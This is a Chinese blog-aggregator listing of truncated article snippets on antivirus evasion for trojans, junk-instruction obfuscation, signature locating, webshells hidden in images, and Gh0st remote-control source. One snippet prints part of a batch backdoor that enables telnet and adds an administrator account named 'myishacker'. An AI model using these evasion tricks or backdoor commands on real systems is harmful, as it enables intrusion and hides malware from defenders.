veil免杀

免杀原理

免杀常用的工具:Ollydbg调试器简称OD
zhu2695·2013-11-19 00:00

免杀技术详解

[免杀]免杀技术详解杀毒软件奈我何                   ——免杀技术详解逆流风注:本文是去年投给黑客X档案的,与那期的主题乐园内容重叠,故未被选上,我也不另投其他杂志,转贴请注明出处,保留版权
zhu2695·2013-11-19 00:00

木马免杀之汇编花指令技巧

木马免杀之汇编花指令技巧相信很多朋友都做过木马免杀,早期的免杀都是加壳和改特征码,现在免杀技术已经发展到花指令免杀,改壳之类的,而这些需要一定的汇编知识,但是汇编却不是一块容易啃的骨头,所以我写了这篇菜鸟版的免杀汇编教程
zhu2695·2013-11-18 23:00

免杀花指令编写组合----非常常用,免杀必备

(该免杀花指令经典,压缩
zhu2695·2013-11-18 23:00

免杀花指令编写手册

一.花指令概念: 花指令是一堆汇编指令组成,对于程序来说,是一堆废话,加不加花指令都 不影响程序的正常运行.编写的花指令要终始保持堆栈的平衡. 二.写花指令的原则: 写花指令的基本原则就是要保持堆栈的平衡. 写花指令细细品味下面一段比喻: 我们把一段花指令比喻成一道数学运算题,把汇编指令(push pop等)比喻成加减 乘除,把寄存器或数据(eax,ebx,1等)比喻成 数字(1,2,3等),那么
zhu2695·2013-11-18 23:00

杀毒软件的查杀病毒的原理以及木马、病毒的免杀伎俩(论杀或者不杀 )

无意中在网上看到的,描述通俗易懂,基本全是基础知识,权当了解吧。====================================================================================================你杀或者不杀我,我就在那里不悲不喜借用黑客防线的名言:在攻与防的对立统一中寻求突破!小甲鱼从现在开始就厚着脸皮跟大家来谈谈杀毒软件查杀病
xuewater·2013-11-04 10:00

我们终将承认人性的自私——《THE PAINTED VEIL

前段时间,同是喜欢毛姆的朋友向我推荐了《面纱》和《情迷翡冷翠》两部电影,这两部作品我都还没有拜读原著,但还是利用昨晚最后的一点时间把《面纱》看完。怎么说呢,结局其实可以预料,终不会是圆满的结局,只看这很轻却令人感伤的结尾,绝对是毛姆的经典作品之一。两个小时的戏份过去,却有太多值得回味和细细反刍的地方。无论的美丽的取景地,还是夏雨和黄秋生的加盟,这部带有浓厚中国色彩的合拍片都令人产生无限的遐想,以及
幸小主·2013-10-01 08:01

现在主流免杀是源码免杀

文件特征码定位: 一般我们先用MyCCL把被查杀文件的文件特征码定位出来,然后用C32判断定位出来的这个特征码是代码还 是字符串,或者是输入表、输出表、版权信息等…定位在不同的地方,就要用不同的方法来进行源码免杀
zhu2695·2013-09-30 22:00

木马

因为,有一种木马叫免杀!首先提醒大家的是,免杀是个相对词,针对目前的技术而言,木马免杀成功率并不高(以多引擎检测为依据)。
jin626889·2013-09-27 22:13

***

因为,有一种***叫免杀!首先提醒大家的是,免杀是个相对词,针对目前的技术而言,***免杀成功率并不高(以多引擎检测为依据)。
jin626889·2013-09-27 22:13

应用程序特征码免杀原理详解

转自:http://hi.baidu.com/12334880/item/03b6815dacead7ced3e10c57首先来简单了解一下杀毒软件查杀病毒的原理,当前杀毒软件对病毒的查杀主要有特征代码法和行为监测法。其中前一个比较方法古老,又分为文件查杀和内存查杀,杀毒软件公司拿到病毒的样本以后,定义一段病毒特征码到病毒库中,然后与扫描的文件比对,如果一致则认为是病毒,内存查杀则是载入内存后再比
xing_anksh·2013-08-27 14:00

MyCCL特征码定位原理学习

这段时间学习WEB方面的技术,遇到了木马免杀特征码定位的问题,这里做一下学习笔记。这里对MyCCL的分块原理做一下探究对指定文件生成10个切块对指定的木马进行切块后,文件列表是这样的。
Jlins·2013-07-30 18:43

MyCCL特征码定位原理学习

这段时间学习WEB方面的技术,遇到了木马免杀特征码定位的问题,这里做一下学习笔记。这里对MyCCL的分块原理做一下探究对指定文件生成10个切块 对指定的木马进行切块后,文件列表是这样的。 
dyllove98·2013-07-30 18:00

免杀技术-基础知识

       去年年底的一段时间,工作较清闲,当时对免杀做过一段时间研究。当时用的是hacksky的免杀教程。不敢说对免杀技术已经入门,但是当时做了一些学习笔记和学习感悟。
w2630460·2013-07-17 13:48

(新方法)图片一句话木马(免杀)

大家都知道有的上传程序会重新绘图来验证图片的合法性,如果不能绘图则视为非法文件,所以我们用CMD的copy命令中的/b参数来把马和图合并成一个文件(copy/b 1.jpg+2.asp3.jpg)今天教你一招不用CMD命令一秒钟制作传说中的图片木马!看图即可操作:单机选定---右键---属性�C--摘要(或详细信息)---在标题作者主题等的编辑框里输入一句话代码---确定即可图片一句话木马看图说话
许肖·2013-07-16 10:04

(新方法)图片一句话***(免杀)

大家都知道有的上传程序会重新绘图来验证图片的合法性,如果不能绘图则视为非法文件,所以我们用CMD的copy命令中的/b参数来把马和图合并成一个文件(copy/b1.jpg+2.asp3.jpg)今天教你一招不用CMD命令一秒钟制作传说中的图片***!看图即可操作:单机选定---右键---属性–--摘要(或详细信息)---在标题作者主题等的编辑框里输入一句话代码---确定即可图片一句话***看图说话
许肖·2013-07-16 10:04

安卓手机变砖了怎么办?先别砸了。。

博主用的魅族MX2,所以是个实实在在魅粉+安卓root控,平时捣鼓完日常的运维工作后就会找点安卓上有意思的APP研究下,这不这几天LEB安全大师(安卓公认的良心之作)又更新了,但苦于没有免杀版(也就是MX2
showerlee·2013-07-16 10:23

安卓手机变砖了怎么办?先别砸了。。

博主用的魅族MX2,所以是个实实在在魅粉+安卓root控,平时捣鼓完日常的运维工作后就会找点安卓上有意思的APP研究下,这不这几天LEB安全大师(安卓公认的良心之作)又更新了,但苦于没有免杀版(也就是MX2
showerlee·2013-07-16 10:23

lcx源代码以及免杀的研究

之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软。顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下。
wangyi_lin·2013-07-09 18:00

网络安全:手动清除gh0st远控服务端

我们在做免杀或者在对gh0st大的修改的时候或者后门被意外破坏,不能用客户端自带的清除,这个时候就需要手动来清除。
太阳湾技术·2013-06-13 14:00

去后门免杀ASP木马程序集合【最新ASP木马】

http://down.51cto.com/data/820807去后门免杀ASP木马程序集合【最新ASP木马】刚从法克论坛收集的,还不错,后门已经去了,有一个f4ck.asp还带后门,不过没关系了,那个后门的域名早已经过期停用了
411161555·2013-06-02 21:16

智能手机创建的文件夹删除不了原因分析及清除方法

答:系统错误“无法删除文件,无法读源文件或磁盘”木马、病毒生会创建畸形文件夹,并将释放的文件存放于其中避免用户或是杀毒软件的清理已经不是什么新鲜的免杀手段,近期更是有许多的木马病毒启用了感染机制,将系统中正常的文件植入恶意代码
佚名·2013-05-30 11:14

33本逆向编程|加密解密|免杀|0day|反汇编|破解等电子书

33本逆向编程|加密解密|免杀|0day|反汇编|破解等电子书终级免杀.pdf http://www.ctdisk.com/file/14449697 文件加密全接触.pdf     http://www.ctdisk.com
LiSteven·2013-05-22 23:00

制作免杀木马教程

一.关于免杀的来源为了让我们的木马在各种杀毒软件的威胁下活的更久.二.什么叫免杀和查杀,可分为二类:1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。
okgogogo71315·2013-05-01 09:03

androidの开机启动service,避免杀

开机启动service避免杀死  (StartServiceByTimer)publicclassFirstBroadcastextendsBroadcastReceiver{ @Override publicvoidonReceive
xiabing082·2013-04-03 16:00

诺顿(Norton)免杀账号

诺顿(Norton)这个东西做免杀,并不困难,如果是改代码免杀,很轻松,如果不改代码的情况下免杀也是可以的。原理简单说一下,诺顿(Norton)会判断文件的使用数量,信任程度,创建时间。
chinafe·2013-03-23 11:00

识别病毒文件四个好方法

所以首先建议大家安装专业的杀毒软件,如瑞星全功能安全软件,可以做到只清除病毒不删除染毒文件,避免杀毒时删除重要文件的情况。另外笔者在这里介绍几个识别病毒
amio555·2013-03-14 18:11

免杀技术学习

如果你想学习免杀技术:第一部分:基础的汇编语言第二部分:修改工具(不指那些傻瓜式软件)。如:OllyDbg.PEditor.C32ASM.MYCCL复合特征码定位器。UE.OC.资源编辑器等。
cogbee·2013-02-25 21:00

Ubuntu安装JDK及环境变量配置

至少,Ubuntu的开关机速度和免杀软就已经帅呆。目前,JDK是必须的,因为学习需要用到。我想,要是都能在Ubuntu上安装日常所需的工具,操作又
lihaiping_·2013-01-19 23:00

近年,在大陆做程序发布的特点

否则还得自己填点东西到自己的程序里面尽量做到免杀,确实不行,还得主动跟他们打招呼,孙子般求他们,恭恭敬敬地提供样本证明这个不是病毒。想把程序做小不容易,做小了,那几个国产免费杀毒软件就得说你是木马。
henysugar·2013-01-17 11:00

【经典源码】网络安全--远程控制--Gh0st3.6饭客网络sid版

Gh0st源码就我所知的有很多的版本,如洪流免杀版,红狼版,败笔版,我手头上的是  2010年5月份山东饭客论坛sid流放出的金牌gh0st版本。
Witch_Soya·2013-01-10 00:00

VC++ 实现增大可执行文件的体积 自定义文件大小

免杀的同学可能都会吧,增大文件体积防止云上传是个不错的方法功能界面:选择文件,是对话框支持文件拖放(详情见:http://blog.csdn.net/eldn__/article/details/8394060
eldn__·2012-12-23 20:00

免杀XP后门(适合菜鸟电脑)

xpbackdoor.bat内容如下 sc config tlntsvr start= auto net start tlntsvr net user myishacker 12345678 /add net localgroup administrators myishacker /add reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
xitong·2012-12-22 22:00

一句话网页木马汇总

ASP一句话1.2.3.免杀大部分网站的一句话4.免杀部分网站过略的一句话5.executerequest("YouPass")php一句话7.aspx一句话8.WebAdmin2Y.x.yaaaaa=
jinxingfeng_cn·2012-12-09 11:00

VBS加密14法你会几种 VBS加密免杀浅谈

手机打字实在在麻烦,所以一些比较简单或太复杂的代码我就不直接提供实例了。1、不是方法的方法--加注释加一些规则无用不含特征码的注释。代码略2、大小写混编利用VBS忽略大小写3、分行与同行混用利用冒号(:)连接多行代码为一行4、一行分多行使用续行符(_)将一行分多行写5、利用execute函数复制代码代码如下:Execute("createobject("&chr(34)&"wscript.shel
·2012-12-05 14:37

脱壳免杀技术大纲

修改工具(不指那些傻瓜式软件).如:OllyDbg.PEditor.C32ASM.MYCCL复合特征码定位器.UE.OC.资源编辑器等.还有一些查壳脱壳软件(如PEIDRL脱壳机等).以下是常用的几种免杀方法及工具
喜欢宁静·2012-11-07 20:51

C++免杀

假设我们的特征码定位在MessageBoxA函数的地址(只是举个例子,一般这个函数不会被杀,其他函数也类似方法)那么我们到源码里面发现,我们在PrintMsg函数中调用了这个API函数,那么我们就要对他进行处理。对于输入表被查杀我们一般的处理方法是修改函数的调用方式,比如采用dll动态调用,通过上图,我们知道我们是以非unicode方式编译的MessageBox,他对应的非Unicode的函数为M
·2012-10-31 09:00

php shell超强免杀、减少体积工具实现代码

lostwolf写的这不是webshell,只是个webshell免杀工具切勿当初webshell使用仅限免杀phpwebshell该工具运行在cli模式!
·2012-10-16 20:31

Veil框架设计理念

Veil框架设计理念项目地址:http://github.com/honovation/veil设计理念做为框架:改不改得动是检验一切架构的唯一标准我们认为框架不仅仅是为了节省开发人员的时间,能够让你五分钟写一个博客系统
·2012-10-16 14:00

Veil框架设计理念

项目地址:http://github.com/honovation/veil设计理念做为框架:改不改得动是检验一切架构的唯一标准我们认为框架不仅仅是为了节省开发人员的时间,能够让你五分钟写一个博客系统。
·2012-10-15 23:00

vc++源码免杀思路 学了免杀并不难

黑客梦想,引领巅峰技术。大家好我是各大论坛出没的by:sk本人qq396443125交流群61454501切记请不要用于非法。谢谢。有时间会给大家在我的QQ空间写文章的。或者会在空间里附加文章或者最新的技巧方法。以下只是简单的思路和定位。也许有人秒过,但是不要笑话我写的笨方法。定位永远是过期不了的。其实这里废话一下,本人并不是大牛,今天跟大家分享下。所以写出这篇文章。(大牛飘过)只是个人实战的经验
tingyuanss·2012-08-21 10:00

免杀的一些笔记(适合刚学免杀不会汇编的新手)

替换汇编指令大集合A开头============================================================================add改adcADD改ADCADD1改sub-1adddwordptrss:[ebp-130],edx---------adcdwordptrss:[ebp-130],edxADD[EAX],CH--------------
tingyuanss·2012-08-21 10:00

杀毒软件的查杀病毒的原理以及木马、病毒的免杀伎俩(论杀或者不杀 )

无意中在网上看到的,描述通俗易懂,基本全是基础知识,权当了解吧。====================================================================================================你杀或者不杀我,我就在那里不悲不喜借用黑客防线的名言:在攻与防的对立统一中寻求突破!小甲鱼从现在开始就厚着脸皮跟大家来谈谈杀毒软件查杀病
wei_yuan_2012·2012-07-22 02:13

极光 0day漏洞

不过免杀做的不好一样被杀。趁国内没有大规模更新补丁之前,在webshell上大肆放马,命中率还是挺高的。
shanzhaisofter·2012-07-05 11:34

英文单词记忆( 积累中 )

in'vaiərənmənt] 环境,外界;周围,围绕;工作平台;(运行)环境Virtual   ['və:tʃuəl]       实质上的,事实上的;(计算机)虚拟的;有效的,虚像的Availability[ə,veilə'biləti
zhounetworking·2012-07-04 15:02

木马的免杀技术

木马免杀,在国内应该起源于05年吧.从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御.免杀技术越来越难.但是万变不离其宗--改特征码.到现在一些辅助软件的行为查杀.以下讲解都是以远程控制软件为例
小叶残风·2012-06-04 09:29

汇编花指令技巧

相信很多朋友都做过木马免杀,早期的免杀都是加壳和改特征码,现在免杀技术已经发展到花指令免杀,改壳之类的,而这些需要一定的汇编知识,但是汇编却不是一块容易啃的骨头,所以我写了这篇菜鸟版的免杀汇编教程,帮助小菜们快速入门
okgogogo71315·2012-05-18 16:30

脱壳免杀技术大纲

以下是常用的几种免杀方法及工具: ||J=7{4wh一. 要使一个木马免杀,首先要准备一个不加壳的木马,这点非常重要,否则免杀操作就不能进行下去。二.然后我们要木马的
billyzhou033·2012-05-14 19:00

免杀方法汇总

【一.入口点加1免杀法:】1.用到工具PEditor2.特点:非常简单实用,但有时还会被卡巴查杀]3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可【二.变化入口地址免杀法:】1.用到工具
·2012-05-12 00:00

局域网***简单方法

***工具:一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版4.5.
fusentao·2012-04-21 14:28
上一页 18 19 20 21 22 23 24 25 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他